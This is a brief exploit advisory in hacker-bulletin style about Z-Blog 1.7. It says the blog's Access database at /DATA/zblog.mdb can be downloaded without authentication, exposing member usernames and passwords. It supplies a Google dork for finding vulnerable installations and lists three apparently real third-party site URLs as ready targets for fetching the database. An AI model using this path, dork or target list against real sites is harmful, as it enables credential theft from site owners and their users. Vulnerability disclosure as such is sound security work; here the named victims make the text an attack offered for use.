Z-Blog 1.7 Authentication Bypass Database Download Vulnerability
* Author : Hasadya Raed
* Contact : RaeD@xxxxxxxxxxx ~>Israel Hacker
* Greetz : Fairoz :)
* Advisory : Z-Blog 1.7 Authentication Bypass/Database Download Vulnerability
* Script : Z-Blog 1.7
* Impact : Remote
* Googledork : "Powered by Z-Blog 1.7" , "Powered By Z-Blog 1.7 Laputa Build
70216"
* Download : http://bbs.rainbowsoft.org/attachment.php?aid=92
--/ REPRODUCE \--
# Attackers Can Authentication Bypass In This Product By Add The Following
Files:
('/DATA/zblog.mdb') And Download The Database Which Contains Table Named
[blog_Member]
The Users Names And Passwords Inside
--/ Examples \--
http://www.uistudio.cn/blog/DATA/zblog.mdb
http://www.kenyja.com/blog/DATA/zblog.mdb
http://www.netpub.cn/nffish/DATA/zblog.mdb